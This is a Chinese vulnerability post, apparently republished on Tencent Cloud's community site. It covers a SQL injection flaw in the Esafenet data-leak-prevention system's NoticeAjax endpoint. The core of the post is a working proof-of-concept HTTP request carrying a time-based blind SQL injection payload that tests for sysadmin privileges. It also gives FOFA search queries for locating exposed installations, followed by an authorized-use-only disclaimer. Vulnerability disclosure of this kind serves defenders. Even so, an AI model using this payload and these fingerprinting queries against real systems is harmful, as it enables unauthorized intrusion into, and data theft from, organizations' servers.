前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >【护网漏洞】亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入漏洞

【护网漏洞】亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入漏洞

作者头像
Al1ex
发布2024-08-01 09:22:43
6140
发布2024-08-01 09:22:43
举报
文章被收录于专栏:网络安全攻防
影响范围

亿赛通数据泄露防护(DLP)系统

漏洞概述

亿赛通数据泄露防护(DLP)系统NoticeAjax SQL注入漏洞

漏洞复现

应用界面如下所示:

漏洞POC如下所示:

代码语言:javascript
复制
POST /CDGServer3/NoticeAjax;Service HTTP/1.1 
Host: x.x.x.x.
Content-Length: 96

command=delNotice&iceId=123';+if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--
资产测绘

FOFA语法:

代码语言:javascript
复制
body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"

免责声明

本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-07-31,如有侵权请联系 cloudcommunity@tencent.com 删除
安全
漏洞
系统
数据泄露
sql

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

安全
漏洞
系统
数据泄露
sql
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 影响范围
  • 漏洞概述
  • 漏洞复现
  • 资产测绘
  • 免责声明
  • 本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论